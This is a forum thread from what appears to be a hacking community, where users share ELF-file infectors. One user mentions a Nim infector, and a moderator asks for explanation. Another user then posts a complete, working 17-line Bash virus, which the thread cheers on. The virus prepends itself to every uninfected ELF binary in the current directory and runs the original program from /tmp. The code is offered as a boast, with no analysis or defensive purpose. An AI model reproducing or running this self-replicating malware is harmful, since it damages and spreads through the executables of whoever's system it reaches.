This is a ELF infector I wrote while learning NimLang 
3 Likes
I think you might have forgotten something here.
2 Likes
yeah fixed… my clipboard has tricked me!
Why Nim if I may ask?
No specific reason, I like writing prependers in languages where they don’t exist and I find interesting. Nim got my attention
Cool.
Your post would have much more value if you could explain the whys and hows behind your code. Alhough @0x00pf has already made a write-up on ELF infectors, don’t hesitate on giving us your own view point. Otherwise your post is nothing more than self-advertisement and fortunately or unfortunately, this site isn’t aimed for that.
I hope you understand,
Cheers!
1 Like
Sure, no problems with that will try to do more than copying and pasting from my website, should be cool
For the LuLZ
This is a 17 LoC, multi-architecture virus (works on x86 -32/64bits-, ARM, MIPS, PowerPC,…). It increases the infected binary in less than 350 bytes!!!.
Feel the power of Bash!
Best language ever for virus development!!
#!/bin/bash
#AMiINFECTED
for f in *; do
if [ ! -z `file $f|grep ELF|cut -d : -f 1` ]; then
if [ -z `grep -a AMiNFECTED $f|head -n 1` ]; then
cp $f .b&&head -n 17 $0>.b&&cat $f>>.b&&mv .b $f
fi
fi
done
rm -f /tmp/.a&&tail -n +18 $0>/tmp/.a
if [ -s /tmp/.a ]; then
echo "I'm an awesome bash virus"
chmod +x /tmp/.a&&/tmp/.a
fi
exit
8 Likes
I must say, this is the coolest thing I have ever seen.
An ELF file injector in bash. I feel as if this needs its own topic. I have to share this nonetheless.
Mind == Blown.
4 Likes
@pry0cc, you really have to check this… code injection using ROP without ptrace from BASH!
Do not underestimate the power of the shell!!
3 Likes